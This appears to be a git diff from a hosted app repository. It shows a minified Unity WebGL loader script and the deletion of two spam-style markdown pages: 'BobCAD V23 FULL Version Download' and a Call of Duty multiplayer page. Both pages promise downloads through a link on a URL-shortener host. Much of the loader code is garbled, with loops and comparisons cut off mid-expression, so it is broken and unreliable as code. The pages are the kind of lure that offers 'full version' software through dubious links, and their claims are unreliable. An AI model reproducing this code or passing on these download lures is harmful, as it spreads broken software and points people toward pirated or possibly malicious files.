      If using custom web server, verify that web server is sending .br files with HTTP Response Header "Content-Encoding: br". Brotli compression may not be supported over HTTP connections. Migrate your server to use HTTPS.'}return void n(s,"error")}}n("Unable to parse "+f.frameworkUrl+"! The file is corrupt, or compression was misconfigured? (check Content-Encoding HTTP Response Header on web server)","error")}var d=unityFramework;unityFramework=null,o.onload=null,URL.revokeObjectURL(t),e(d)},o.onerror=function(e){n("Unable to load file "+f.frameworkUrl+"! Check that the file exists on the remote server. (also check browser Console and Devtools Network tab to debug)","error")},document.body.appendChild(o),f.deinitializers.push(function(){document.body.removeChild(o)})})})}function c(){Promise.all([u(),d("codeUrl")]).then(function(e){f.wasmBinary=e[1],e[0](f)});var e=d("dataUrl");f.preRun.push(function(){f.addRunDependency("dataUrl"),e.then(function(e){var t=new DataView(e.buffer,e.byteOffset,e.byteLength),r=0,n="UnityWebData1.0\0";if(!String.fromCharCode.apply(null,e.subarray(r,r+n.length))==n)throw"unknown data format";r+=n.length;var o=t.getUint32(r,!0);for(r+=4;r0;d=u,u=l.indexOf("/",d)+1)f.FS_createPath(l.substring(0,d),l.substring(d,u-1),!0,!0);f.FS_createDataFile(l,null,e.subarray(a,a+i),!0,!0,!0)}f.removeRunDependency("dataUrl")})})}r=r||function(){};var f={canvas:e,webglContextAttributes:{preserveDrawingBuffer:!1},cacheControl:function(e){return e==f.dataUrl?"must-revalidate":"no-store"},streamingAssetsUrl:"StreamingAssets",downloadProgress:{},deinitializers:[],intervals:{},setInterval:function(e,t){var r=window.setInterval(e,t);return this.intervals[r]=!0,r},clearInterval:function(e){delete this.intervals[e],window.clearInterval(e)},preRun:[],postRun:[],print:function(e){console.log(e)},printErr:function(e){console.error(e),"string"==typeof e&&e.indexOf("wasm streaming compile failed")!=-1&&(e.toLowerCase().indexOf("mime")!=-1?n('HTTP Response Header "Content-Type" configured incorrectly on the server for file '+f.codeUrl+' , should be "application/wasm". Startup time performance will suffer.',"warning"):n('WebAssembly streaming compilation failed! This can happen for example if "Content-Encoding" HTTP header is incorrectly enabled on the server for file '+f.codeUrl+", but the file is not pre-compressed on disk (or vice versa). 
Check the Network tab in browser Devtools to debug server header configuration.","warning"))},locateFile:function(e){return e},disabledCanvasEvents:["contextmenu","dragstart"]};for(var h in t)f[h]=t[h];f.streamingAssetsUrl=new URL(f.streamingAssetsUrl,document.URL).href;var b=f.disabledCanvasEvents.slice();b.forEach(function(t){e.addEventListener(t,a)}),window.addEventListener("error",o),window.addEventListener("unhandledrejection",o),f.deinitializers.push(function(){f.disableAccessToMediaDevices(),b.forEach(function(t){e.removeEventListener(t,a)}),window.removeEventListener("error",o),window.removeEventListener("unhandledrejection",o);for(var t in f.intervals)window.clearInterval(t);f.intervals={}}),f.QuitCleanup=function(){for(var e=0;e=200&&this.status<=299}.bind(this)})}function o(e,t,r,n,o){var a={url:e,version:l.version,company:t,product:r,updated:n,revalidated:n,accessed:n,response:{headers:{}}};return o&&(o.headers.forEach(function(e,t){a.response.headers[t]=e}),["redirected","status","statusText","type","url"].forEach(function(e){a.response[e]=o[e]}),a.response.parsedBody=o.parsedBody),a}function a(e,t){return(!t||!t.method||"GET"===t.method)&&((!t||["must-revalidate","immutable"].indexOf(t.control)!=-1)&&!!e.match("^https?://"))}function i(i,u){function c(t,r){return d(t,r).then(function(t){return!m.enabled||m.revalidated?t:304===t.status?(m.result.revalidated=m.result.accessed,m.revalidated=!0,h.storeRequest(m.result).then(function(){e("'"+m.result.url+"' successfully revalidated and served from the indexedDB cache")}).catch(function(t){e("'"+m.result.url+"' successfully revalidated but not stored in the indexedDB cache due to the error: "+t)}),new n(m.result.response)):(200==t.status?(m.result=o(t.url,m.company,m.product,m.accessed,t),m.revalidated=!0,h.storeRequest(m.result).then(function(){e("'"+m.result.url+"' successfully downloaded and stored in the indexedDB cache")}).catch(function(t){e("'"+m.result.url+"' successfully downloaded but not stored in the indexedDB cache due to the error: "+t)})):e("'"+m.result.url+"' request failed with status: "+t.status+" "+t.statusText),t)})}function f(e){u&&u.onProgress&&(u.onProgress({type:"progress",total:e.parsedBody.length,loaded:e.parsedBody.length,lengthComputable:!0}),u.onProgress({type:"load",total:e.parsedBody.length,loaded:e.parsedBody.length,lengthComputable:!0}))}var h=s.getInstance(),b=t("string"==typeof i?i:i.url),m={enabled:a(b,u)};return u&&(m.control=u.control,m.company=u.company,m.product=u.product),m.result=o(b,m.company,m.product,Date.now()),m.revalidated=!1,m.enabled?h.loadRequest(m.result.url).then(function(t){if(!t||t.version!==l.version)return c(i,u);m.result=t,m.result.accessed=Date.now();var o=new n(m.result.response);if("immutable"==m.control)return m.revalidated=!0,h.storeRequest(m.result),e("'"+m.result.url+"' served from the indexedDB cache without revalidation"),f(o),o;if(r(m.result.url)&&(o.headers.get("Last-Modified")||o.headers.get("ETag")))return fetch(m.result.url,{method:"HEAD"}).then(function(t){return m.revalidated=["Last-Modified","ETag"].every(function(e){return!o.headers.get(e)||o.headers.get(e)==t.headers.get(e)}),m.revalidated?(m.result.revalidated=m.result.accessed,h.storeRequest(m.result),e("'"+m.result.url+"' successfully revalidated and served from the indexedDB cache"),f(o),o):c(i,u)});u=u||{};var a=u.headers||{};return 
u.headers=a,o.headers.get("Last-Modified")?(a["If-Modified-Since"]=o.headers.get("Last-Modified"),a["Cache-Control"]="no-cache"):o.headers.get("ETag")&&(a["If-None-Match"]=o.headers.get("ETag"),a["Cache-Control"]="no-cache"),c(i,u)}).catch(function(t){return e("Failed to load '"+m.result.url+"' from indexedDB cache due to the error: "+t),d(i,u)}):d(i,u)}var s=f.UnityCache,l=s.RequestStore,d=f.fetchWithProgress;return n.prototype.arrayBuffer=function(){return Promise.resolve(this.parsedBody.buffer)},n.prototype.blob=function(){return this.arrayBuffer().then(function(e){return new Blob([e])})},n.prototype.json=function(){return this.text().then(function(e){return JSON.parse(e)})},n.prototype.text=function(){var e=new TextDecoder;return Promise.resolve(e.decode(this.parsedBody))},i}();var w={gzip:{require:function(e){var t={"inflate.js":function(e,t,r){"use strict";function n(e){if(!(this instanceof n))return new n(e);this.options=s.assign({chunkSize:16384,windowBits:0,to:""},e||{});var t=this.options;t.raw&&t.windowBits>=0&&t.windowBits<16&&(t.windowBits=-t.windowBits,0===t.windowBits&&(t.windowBits=-15)),!(t.windowBits>=0&&t.windowBits<16)||e&&e.windowBits||(t.windowBits+=32),t.windowBits>15&&t.windowBits<48&&0===(15&t.windowBits)&&(t.windowBits|=15),this.err=0,this.msg="",this.ended=!1,this.chunks=[],this.strm=new c,this.strm.avail_out=0;var r=i.inflateInit2(this.strm,t.windowBits);if(r!==d.Z_OK)throw new Error(u[r]);this.header=new f,i.inflateGetHeader(this.strm,this.header)}function o(e,t){var r=new n(t);if(r.push(e,!0),r.err)throw r.msg||u[r.err];return r.result}function a(e,t){return t=t||{},t.raw=!0,o(e,t)}var i=e("./zlib/inflate"),s=e("./utils/common"),l=e("./utils/strings"),d=e("./zlib/constants"),u=e("./zlib/messages"),c=e("./zlib/zstream"),f=e("./zlib/gzheader"),h=Object.prototype.toString;n.prototype.push=function(e,t){var r,n,o,a,u,c,f=this.strm,b=this.options.chunkSize,m=this.options.dictionary,g=!1;if(this.ended)return!1;n=t===~~t?t:t===!0?d.Z_FINISH:d.Z_NO_FLUSH,"string"==typeof e?f.input=l.binstring2buf(e):"[object ArrayBuffer]"===h.call(e)?f.input=new Uint8Array(e):f.input=e,f.next_in=0,f.avail_in=f.input.length;do{if(0===f.avail_out&&(f.output=new s.Buf8(b),f.next_out=0,f.avail_out=b),r=i.inflate(f,d.Z_NO_FLUSH),r===d.Z_NEED_DICT&&m&&(c="string"==typeof m?l.string2buf(m):"[object ArrayBuffer]"===h.call(m)?new Uint8Array(m):m,r=i.inflateSetDictionary(this.strm,c)),r===d.Z_BUF_ERROR&&g===!0&&(r=d.Z_OK,g=!1),r!==d.Z_STREAM_END&&r!==d.Z_OK)return this.onEnd(r),this.ended=!0,!1;f.next_out&&(0!==f.avail_out&&r!==d.Z_STREAM_END&&(0!==f.avail_in||n!==d.Z_FINISH&&n!==d.Z_SYNC_FLUSH)||("string"===this.options.to?(o=l.utf8border(f.output,f.next_out),a=f.next_out-o,u=l.buf2string(f.output,o),f.next_out=a,f.avail_out=b-a,a&&s.arraySet(f.output,f.output,o,a,0),this.onData(u)):this.onData(s.shrinkBuf(f.output,f.next_out)))),0===f.avail_in&&0===f.avail_out&&(g=!0)}while((f.avail_in>0||0===f.avail_out)&&r!==d.Z_STREAM_END);return r===d.Z_STREAM_END&&(n=d.Z_FINISH),n===d.Z_FINISH?(r=i.inflateEnd(this.strm),this.onEnd(r),this.ended=!0,r===d.Z_OK):n!==d.Z_SYNC_FLUSH||(this.onEnd(d.Z_OK),f.avail_out=0,!0)},n.prototype.onData=function(e){this.chunks.push(e)},n.prototype.onEnd=function(e){e===d.Z_OK&&("string"===this.options.to?this.result=this.chunks.join(""):this.result=s.flattenChunks(this.chunks)),this.chunks=[],this.err=e,this.msg=this.strm.msg},r.Inflate=n,r.inflate=o,r.inflateRaw=a,r.ungzip=o},"utils/common.js":function(e,t,r){"use strict";var n="undefined"!=typeof 
Uint8Array&&"undefined"!=typeof Uint16Array&&"undefined"!=typeof Int32Array;r.assign=function(e){for(var t=Array.prototype.slice.call(arguments,1);t.length;){var r=t.shift();if(r){if("object"!=typeof r)throw new TypeError(r+"must be non-object");for(var n in r)r.hasOwnProperty(n)&&(e[n]=r[n])}}return e},r.shrinkBuf=function(e,t){return e.length===t?e:e.subarray?e.subarray(0,t):(e.length=t,e)};var o={arraySet:function(e,t,r,n,o){if(t.subarray&&e.subarray)return void e.set(t.subarray(r,r+n),o);for(var a=0;a=252?6:l>=248?5:l>=240?4:l>=224?3:l>=192?2:1;s[254]=s[254]=1,r.string2buf=function(e){var t,r,n,a,i,s=e.length,l=0;for(a=0;a>>6,t[i++]=128|63&r):r<65536?(t[i++]=224|r>>>12,t[i++]=128|r>>>6&63,t[i++]=128|63&r):(t[i++]=240|r>>>18,t[i++]=128|r>>>12&63,t[i++]=128|r>>>6&63,t[i++]=128|63&r);return t},r.buf2binstring=function(e){return n(e,e.length)},r.binstring2buf=function(e){for(var t=new o.Buf8(e.length),r=0,n=t.length;r4)d[o++]=65533,r+=i-1;else{for(a&=2===i?31:3===i?15:7;i>1&&r1?d[o++]=65533:a<65536?d[o++]=a:(a-=65536,d[o++]=55296|a>>10&1023,d[o++]=56320|1023&a)}return n(d,o)},r.utf8border=function(e,t){var r;for(t=t||e.length,t>e.length&&(t=e.length),r=t-1;r>=0&&128===(192&e[r]);)r--;return r<0?t:0===r?t:r+s[e[r]]>t?r:t}},"zlib/inflate.js":function(e,t,r){"use strict";function n(e){return(e>>>24&255)+(e>>>8&65280)+((65280&e)<<8)+((255&e)<<24)}function o(){this.mode=0,this.last=!1,this.wrap=0,this.havedict=!1,this.flags=0,this.dmax=0,this.check=0,this.total=0,this.head=null,this.wbits=0,this.wsize=0,this.whave=0,this.wnext=0,this.window=null,this.hold=0,this.bits=0,this.length=0,this.offset=0,this.extra=0,this.lencode=null,this.distcode=null,this.lenbits=0,this.distbits=0,this.ncode=0,this.nlen=0,this.ndist=0,this.have=0,this.next=null,this.lens=new w.Buf16(320),this.work=new w.Buf16(288),this.lendyn=null,this.distdyn=null,this.sane=0,this.back=0,this.was=0}function a(e){var t;return e&&e.state?(t=e.state,e.total_in=e.total_out=t.total=0,e.msg="",t.wrap&&(e.adler=1&t.wrap),t.mode=z,t.last=0,t.havedict=0,t.dmax=32768,t.head=null,t.hold=0,t.bits=0,t.lencode=t.lendyn=new w.Buf32(me),t.distcode=t.distdyn=new w.Buf32(ge),t.sane=1,t.back=-1,T):O}function i(e){var t;return e&&e.state?(t=e.state,t.wsize=0,t.whave=0,t.wnext=0,a(e)):O}function s(e,t){var r,n;return e&&e.state?(n=e.state,t<0?(r=0,t=-t):(r=(t>>4)+1,t<48&&(t&=15)),t&&(t<8||t>15)?O:(null!==n.window&&n.wbits!==t&&(n.window=null),n.wrap=r,n.wbits=t,i(e))):O}function l(e,t){var r,n;return e?(n=new o,e.state=n,n.window=null,r=s(e,t),r!==T&&(e.state=null),r):O}function d(e){return l(e,we)}function u(e){if(ve){var t;for(g=new w.Buf32(512),p=new w.Buf32(32),t=0;t<144;)e.lens[t++]=8;for(;t<256;)e.lens[t++]=9;for(;t<280;)e.lens[t++]=7;for(;t<288;)e.lens[t++]=8;for(x(S,e.lens,0,288,g,0,e.work,{bits:9}),t=0;t<32;)e.lens[t++]=5;x(E,e.lens,0,32,p,0,e.work,{bits:5}),ve=!1}e.lencode=g,e.lenbits=9,e.distcode=p,e.distbits=5}function c(e,t,r,n){var o,a=e.state;return null===a.window&&(a.wsize=1<=a.wsize?(w.arraySet(a.window,t,r-a.wsize,a.wsize,0),a.wnext=0,a.whave=a.wsize):(o=a.wsize-a.wnext,o>n&&(o=n),w.arraySet(a.window,t,r-n,o,a.wnext),n-=o,n?(w.arraySet(a.window,t,r-n,n,0),a.wnext=n,a.whave=a.wsize):(a.wnext+=o,a.wnext===a.wsize&&(a.wnext=0),a.whave>>8&255,r.check=y(r.check,Be,2,0),f=0,h=0,r.mode=N;break}if(r.flags=0,r.head&&(r.head.done=!1),!(1&r.wrap)||(((255&f)<<8)+(f>>8))%31){e.msg="incorrect header check",r.mode=fe;break}if((15&f)!==D){e.msg="unknown compression method",r.mode=fe;break}if(f>>>=4,h-=4,xe=(15&f)+8,0===r.wbits)r.wbits=xe;else 
if(xe>r.wbits){e.msg="invalid window size",r.mode=fe;break}r.dmax=1<>8&1),512&r.flags&&(Be[0]=255&f,Be[1]=f>>>8&255,r.check=y(r.check,Be,2,0)),f=0,h=0,r.mode=F;case F:for(;h<32;){if(0===l)break e;l--,f+=o[i++]<>>8&255,Be[2]=f>>>16&255,Be[3]=f>>>24&255,r.check=y(r.check,Be,4,0)),f=0,h=0,r.mode=Z;case Z:for(;h<16;){if(0===l)break e;l--,f+=o[i++]<>8),512&r.flags&&(Be[0]=255&f,Be[1]=f>>>8&255,r.check=y(r.check,Be,2,0)),f=0,h=0,r.mode=j;case j:if(1024&r.flags){for(;h<16;){if(0===l)break e;l--,f+=o[i++]<>>8&255,r.check=y(r.check,Be,2,0)),f=0,h=0}else r.head&&(r.head.extra=null);r.mode=H;case H:if(1024&r.flags&&(g=r.length,g>l&&(g=l),g&&(r.head&&(xe=r.head.extra_len-r.length,r.head.extra||(r.head.extra=new Array(r.head.extra_len)),w.arraySet(r.head.extra,o,i,g,xe)),512&r.flags&&(r.check=y(r.check,o,g,i)),l-=g,i+=g,r.length-=g),r.length))break e;r.length=0,r.mode=M;case M:if(2048&r.flags){if(0===l)break e;g=0;do xe=o[i+g++],r.head&&xe&&r.length<65536&&(r.head.name+=String.fromCharCode(xe));while(xe&&g>9&1,r.head.done=!0),e.adler=r.check=0,r.mode=V;break;case q:for(;h<32;){if(0===l)break e;l--,f+=o[i++]<>>=7&h,h-=7&h,r.mode=de;break}for(;h<3;){if(0===l)break e;l--,f+=o[i++]<>>=1,h-=1,3&f){case 0:r.mode=Q;break;case 1:if(u(r),r.mode=re,t===U){f>>>=2,h-=2;break e}break;case 2:r.mode=$;break;case 3:e.msg="invalid block type",r.mode=fe}f>>>=2,h-=2;break;case Q:for(f>>>=7&h,h-=7&h;h<32;){if(0===l)break e;l--,f+=o[i++]<>>16^65535)){e.msg="invalid stored block lengths",r.mode=fe;break}if(r.length=65535&f,f=0,h=0,r.mode=X,t===U)break e;case X:r.mode=J;case J:if(g=r.length){if(g>l&&(g=l),g>d&&(g=d),0===g)break e;w.arraySet(a,o,i,g,s),l-=g,i+=g,d-=g,s+=g,r.length-=g;break}r.mode=V;break;case $:for(;h<14;){if(0===l)break e;l--,f+=o[i++]<>>=5,h-=5,r.ndist=(31&f)+1,f>>>=5,h-=5,r.ncode=(15&f)+4,f>>>=4,h-=4,r.nlen>286||r.ndist>30){e.msg="too many length or distance symbols",r.mode=fe;break}r.have=0,r.mode=ee;case ee:for(;r.have>>=3,h-=3}for(;r.have<19;)r.lens[Ue[r.have++]]=0;if(r.lencode=r.lendyn,r.lenbits=7,Se={bits:r.lenbits},_e=x(_,r.lens,0,19,r.lencode,0,r.work,Se),r.lenbits=Se.bits,_e){e.msg="invalid code lengths set",r.mode=fe;break}r.have=0,r.mode=te;case te:for(;r.have>>24,pe=Ce>>>16&255,we=65535&Ce,!(ge<=h);){if(0===l)break e;l--,f+=o[i++]<>>=ge,h-=ge,r.lens[r.have++]=we;else{if(16===we){for(Ee=ge+2;h>>=ge,h-=ge,0===r.have){e.msg="invalid bit length repeat",r.mode=fe; -break}xe=r.lens[r.have-1],g=3+(3&f),f>>>=2,h-=2}else if(17===we){for(Ee=ge+3;h>>=ge,h-=ge,xe=0,g=3+(7&f),f>>>=3,h-=3}else{for(Ee=ge+7;h>>=ge,h-=ge,xe=0,g=11+(127&f),f>>>=7,h-=7}if(r.have+g>r.nlen+r.ndist){e.msg="invalid bit length repeat",r.mode=fe;break}for(;g--;)r.lens[r.have++]=xe}}if(r.mode===fe)break;if(0===r.lens[256]){e.msg="invalid code -- missing end-of-block",r.mode=fe;break}if(r.lenbits=9,Se={bits:r.lenbits},_e=x(S,r.lens,0,r.nlen,r.lencode,0,r.work,Se),r.lenbits=Se.bits,_e){e.msg="invalid literal/lengths set",r.mode=fe;break}if(r.distbits=6,r.distcode=r.distdyn,Se={bits:r.distbits},_e=x(E,r.lens,r.nlen,r.ndist,r.distcode,0,r.work,Se),r.distbits=Se.bits,_e){e.msg="invalid distances set",r.mode=fe;break}if(r.mode=re,t===U)break e;case re:r.mode=ne;case ne:if(l>=6&&d>=258){e.next_out=s,e.avail_out=d,e.next_in=i,e.avail_in=l,r.hold=f,r.bits=h,k(e,m),s=e.next_out,a=e.output,d=e.avail_out,i=e.next_in,o=e.input,l=e.avail_in,f=r.hold,h=r.bits,r.mode===V&&(r.back=-1);break}for(r.back=0;Ce=r.lencode[f&(1<>>24,pe=Ce>>>16&255,we=65535&Ce,!(ge<=h);){if(0===l)break 
e;l--,f+=o[i++]<>ve)],ge=Ce>>>24,pe=Ce>>>16&255,we=65535&Ce,!(ve+ge<=h);){if(0===l)break e;l--,f+=o[i++]<>>=ve,h-=ve,r.back+=ve}if(f>>>=ge,h-=ge,r.back+=ge,r.length=we,0===pe){r.mode=le;break}if(32&pe){r.back=-1,r.mode=V;break}if(64&pe){e.msg="invalid literal/length code",r.mode=fe;break}r.extra=15&pe,r.mode=oe;case oe:if(r.extra){for(Ee=r.extra;h>>=r.extra,h-=r.extra,r.back+=r.extra}r.was=r.length,r.mode=ae;case ae:for(;Ce=r.distcode[f&(1<>>24,pe=Ce>>>16&255,we=65535&Ce,!(ge<=h);){if(0===l)break e;l--,f+=o[i++]<>ve)],ge=Ce>>>24,pe=Ce>>>16&255,we=65535&Ce,!(ve+ge<=h);){if(0===l)break e;l--,f+=o[i++]<>>=ve,h-=ve,r.back+=ve}if(f>>>=ge,h-=ge,r.back+=ge,64&pe){e.msg="invalid distance code",r.mode=fe;break}r.offset=we,r.extra=15&pe,r.mode=ie;case ie:if(r.extra){for(Ee=r.extra;h>>=r.extra,h-=r.extra,r.back+=r.extra}if(r.offset>r.dmax){e.msg="invalid distance too far back",r.mode=fe;break}r.mode=se;case se:if(0===d)break e;if(g=m-d,r.offset>g){if(g=r.offset-g,g>r.whave&&r.sane){e.msg="invalid distance too far back",r.mode=fe;break}g>r.wnext?(g-=r.wnext,p=r.wsize-g):p=r.wnext-g,g>r.length&&(g=r.length),me=r.window}else me=a,p=s-r.offset,g=r.length;g>d&&(g=d),d-=g,r.length-=g;do a[s++]=me[p++];while(--g);0===r.length&&(r.mode=ne);break;case le:if(0===d)break e;a[s++]=r.length,d--,r.mode=ne;break;case de:if(r.wrap){for(;h<32;){if(0===l)break e;l--,f|=o[i++]<>>16&65535|0,i=0;0!==r;){i=r>2e3?2e3:r,r-=i;do o=o+t[n++]|0,a=a+o|0;while(--i);o%=65521,a%=65521}return o|a<<16|0}t.exports=n},"zlib/crc32.js":function(e,t,r){"use strict";function n(){for(var e,t=[],r=0;r<256;r++){e=r;for(var n=0;n<8;n++)e=1&e?3988292384^e>>>1:e>>>1;t[r]=e}return t}function o(e,t,r,n){var o=a,i=n+r;e^=-1;for(var s=n;s>>8^o[255&(e^t[s])];return e^-1}var a=n();t.exports=o},"zlib/inffast.js":function(e,t,r){"use strict";var n=30,o=12;t.exports=function(e,t){var r,a,i,s,l,d,u,c,f,h,b,m,g,p,w,v,y,k,x,_,S,E,C,B,U;r=e.state,a=e.next_in,B=e.input,i=a+(e.avail_in-5),s=e.next_out,U=e.output,l=s-(t-e.avail_out),d=s+(e.avail_out-257),u=r.dmax,c=r.wsize,f=r.whave,h=r.wnext,b=r.window,m=r.hold,g=r.bits,p=r.lencode,w=r.distcode,v=(1<>>24,m>>>=x,g-=x,x=k>>>16&255,0===x)U[s++]=65535&k;else{if(!(16&x)){if(0===(64&x)){k=p[(65535&k)+(m&(1<>>=x,g-=x),g<15&&(m+=B[a++]<>>24,m>>>=x,g-=x,x=k>>>16&255,!(16&x)){if(0===(64&x)){k=w[(65535&k)+(m&(1<u){e.msg="invalid distance too far back",r.mode=n;break e}if(m>>>=x,g-=x,x=s-l,S>x){if(x=S-x,x>f&&r.sane){e.msg="invalid distance too far back",r.mode=n;break e}if(E=0,C=b,0===h){if(E+=c-x,x<_){_-=x;do U[s++]=b[E++];while(--x);E=s-S,C=U}}else if(h2;)U[s++]=C[E++],U[s++]=C[E++],U[s++]=C[E++],_-=3;_&&(U[s++]=C[E++],_>1&&(U[s++]=C[E++]))}else{E=s-S;do U[s++]=U[E++],U[s++]=U[E++],U[s++]=U[E++],_-=3;while(_>2);_&&(U[s++]=U[E++],_>1&&(U[s++]=U[E++]))}break}}break}}while(a>3,a-=_,g-=_<<3,m&=(1<=1&&0===j[O];O--);if(I>O&&(I=O),0===O)return m[g++]=20971520,m[g++]=20971520,w.bits=1,0;for(L=1;L0&&(e===s||1!==O))return-1;for(H[1]=0,T=1;Ta||e===d&&z>i)return 1;for(;;){E=T-P,p[R]S?(C=M[W+p[R]],B=F[Z+p[R]]):(C=96,B=0),v=1<>P)+y]=E<<24|C<<16|B|0;while(0!==y);for(v=1<>=1;if(0!==v?(N&=v-1,N+=v):N=0,R++,0===--j[T]){if(T===O)break;T=t[r+p[R]]}if(T>I&&(N&x)!==k){for(0===P&&(P=I),_+=L,A=T-P,D=1<a||e===d&&z>i)return 1;k=N&x,m[k]=I<<24|A<<16|_-g|0}}return 0!==N&&(m[_+N]=T-P<<24|64<<16|0),w.bits=I,0}}};for(var r in t)t[r].folder=r.substring(0,r.lastIndexOf("/")+1);var n=function(e){var r=[];return 
e=e.split("/").every(function(e){return".."==e?r.pop():"."==e||""==e||r.push(e)})?r.join("/"):null,e?t[e]||t[e+".js"]||t[e+"/index.js"]:null},o=function(e,t){return e?n(e.folder+"node_modules/"+t)||o(e.parent,t):null},a=function(e,t){var r=t.match(/^\//)?null:e?t.match(/^\.\.?\//)?n(e.folder+t):o(e,t):n(t);if(!r)throw"module not found: "+t;return r.exports||(r.parent=e,r(a.bind(null,r),r,r.exports={})),r.exports};return a(null,e)},decompress:function(e){this.exports||(this.exports=this.require("inflate.js"));try{return this.exports.inflate(e)}catch(e){}},hasUnityMarker:function(e){var t=10,r="UnityWeb Compressed Content (gzip)";if(t>e.length||31!=e[0]||139!=e[1])return!1;var n=e[3];if(4&n){if(t+2>e.length)return!1;if(t+=2+e[t]+(e[t+1]<<8),t>e.length)return!1}if(8&n){for(;te.length)return!1;t++}return 16&n&&String.fromCharCode.apply(null,e.subarray(t,t+r.length+1))==r+"\0"}}};return new Promise(function(e,t){f.SystemInfo.hasWebGL?f.SystemInfo.hasWasm?(1==f.SystemInfo.hasWebGL&&f.print('Warning: Your browser does not support "WebGL 2" Graphics API, switching to "WebGL 1"'),f.startupErrorHandler=t,r(0),f.postRun.push(function(){r(1),delete f.startupErrorHandler,e(p)}),c()):t("Your browser does not support WebAssembly."):t("Your browser does not support WebGL.")})} \ No newline at end of file diff --git a/spaces/usbethFlerru/sovits-modelsV2/example/Bobcad V23 FULL Version Download EXCLUSIVE.md b/spaces/usbethFlerru/sovits-modelsV2/example/Bobcad V23 FULL Version Download EXCLUSIVE.md deleted file mode 100644 index 590ab5f823d9dfefe22f8f6e33845f980b197c09..0000000000000000000000000000000000000000 --- a/spaces/usbethFlerru/sovits-modelsV2/example/Bobcad V23 FULL Version Download EXCLUSIVE.md +++ /dev/null @@ -1,47 +0,0 @@ - -

      BobCAD V23 Full Version Download - A Complete Guide

      -

      If you are looking for powerful, easy-to-use CAD-CAM software that can handle all your CNC machining needs, you might want to consider BobCAD V23 Full Version. This software is designed to help you create 2D and 3D models, assign advanced toolpaths, and generate efficient G-code for your CNC machines. In this article, we will show you how to download BobCAD V23 Full Version for free, what its key features are, and why you should use it for your CNC projects.

      -

      bobcad v23 FULL Version download


      Download File: https://urlcod.com/2uyU9h



      - -

      How to Download BobCAD V23 Full Version for Free

      -

      BobCAD V23 Full Version is available for download from the official website of BobCAD-CAM. You can get it by filling out a simple form with your name, email, phone number, and country. You will then receive an email with a link to download the software. You can also request a free demo CD or DVD if you prefer.

      -

      The download file is about 500 MB in size and it will take some time to complete depending on your internet speed. Once you have downloaded the file, you can run it to install the software on your computer. You will need to enter your license key or request a trial key to activate the software. You can also contact a helpful CAD-CAM specialist at 877-262-2231 if you need any assistance.

      - -

      What are the Key Features of BobCAD V23 Full Version

      -

      BobCAD V23 Full Version is a complete CAD-CAM solution that offers many features to help you design and machine your parts faster and easier. Some of the key features are:

      -
        -
      • 2D & 3D Wireframe, Surface, and Solid Modeling Tools: You can create complex geometries using various drawing and editing tools, such as lines, arcs, circles, splines, curves, surfaces, solids, extrude, revolve, sweep, loft, fillet, chamfer, shell, boolean operations, and more.
      • -
      • 2, 3, 4 & 5 Axis Milling and Turning Toolpaths: You can assign various toolpaths to your models, such as contour, pocket, drill, tap, thread mill, engrave, face mill, adaptive roughing, rest machining, pencil trace, project curve, morph between two curves or surfaces, swarf cutting, rotary axis wrapping and indexing, and more.
      • -
      • High Speed Adaptive Machining Strategies: You can use advanced algorithms that adjust the toolpath based on the material conditions and tool load. This results in faster cutting speeds, reduced cycle times, smoother surface finishes, and longer tool life.
      • -
      • Surface Based Toolpaths: You can use surface geometry to define the toolpath direction and shape. This allows you to create complex shapes and patterns that are not possible with traditional toolpaths.
      • -
      • Dynamic Machining Strategies™: You can apply multiple machining strategies to a single feature with a single click. This saves you time and simplifies the programming process.
      • -
      • Wizard Driven Stock & Toolpath Setting Controls: You can use intuitive wizards to define your stock size and shape, select your tools and holders from a library or create your own custom tools, set your feeds and speeds based on material type and tool data, adjust your cutting parameters such as depth of cut, stepover, lead in/out angles and radiuses etc., preview your toolpath in 2D or 3D mode with backplotting and simulation options.
      • -
      • Associative CAM Tree: You can easily manage your toolpaths in a tree structure that shows the relationship between features and operations. You can edit any parameter at any level and see the changes reflected in the toolpath instantly. You can also reorder or copy/paste operations as needed.
      • -
      • Tool & Material Libraries: You can access a huge library of tools and materials that are pre-defined with optimal cutting parameters. You can also create your own custom libraries or import them from other sources.
      • -
      • Backplot & CNC Simulation: You can verify your toolpath before sending it to the machine by using backplotting and simulation options. You can see the tool movement in 2D or 3D mode with different display options such as wireframe or solid mode. You can also check for any errors or collisions with the stock or machine components.
      • -
      • Huge Library of Free Post Processors: You can generate G-code for any CNC machine by using one of the many post processors available for free from BobCAD-CAM. You can also request a custom post processor or modify an existing one if needed.
      • -
      - -

      Why You Should Use BobCAD V23 Full Version for Your CNC Projects

      -

      BobCAD V23 Full Version is a powerful CAD-CAM software that can help you improve your productivity and profitability in CNC machining. Here are some of the benefits of using BobCAD V23 Full Version:

      -

      -
        -
      • You can design and machine any part with ease using the comprehensive modeling and toolpath options.
      • -
      • You can reduce programming time by using the dynamic machining strategies and wizard driven controls.
      • -
      • You can optimize your cutting performance by using the high speed adaptive machining strategies and surface based toolpaths.
      • -
      • You can ensure accuracy and quality by using the backplotting and simulation options.
      • -
      • You can program all your CNC machines within one interface by using the huge library of free post processors.
      • -
      • You can get support from a team of experienced technicians who are ready to help you with any challenge.
      • -
      • You can get started quickly by downloading BobCAD V23 Full Version for free from the official website of BobCAD-CAM.
      • -
      - -

      Conclusion

      -

      BobCAD V23 Full Version is a complete CAD-CAM solution that can help you design and machine any part faster and easier. It offers many features that allow you to create complex geometries, assign advanced toolpaths, -and generate efficient G-code for your CNC machines. It also offers support from a team of experienced technicians who are ready to help you with any challenge. If you want to get started with BobCAD V23 Full Version, -you can download it for free from the official website of BobCAD-CAM. You will not regret it!

      -

      3cee63e6c2
      -
      -
      \ No newline at end of file diff --git a/spaces/usbethFlerru/sovits-modelsV2/example/Cod Modern Warfare Multiplayer Tips and Tricks for Every Game Mode.md b/spaces/usbethFlerru/sovits-modelsV2/example/Cod Modern Warfare Multiplayer Tips and Tricks for Every Game Mode.md deleted file mode 100644 index a3647673b078a6e9e49395326b5bb87ee86cbc82..0000000000000000000000000000000000000000 --- a/spaces/usbethFlerru/sovits-modelsV2/example/Cod Modern Warfare Multiplayer Tips and Tricks for Every Game Mode.md +++ /dev/null @@ -1,20 +0,0 @@ - -

      Get ready to play in a variety of settings, from a small, bustling marketplace to a modern museum nestled in the foothills of the mountains. Modern Warfare II will hit the ground running on day one, ready to welcome newcomers and fierce competitors alike.

      -

      Cod Modern Warfare Multiplayer


      Download Zip: https://urlcod.com/2uyWhz



      -

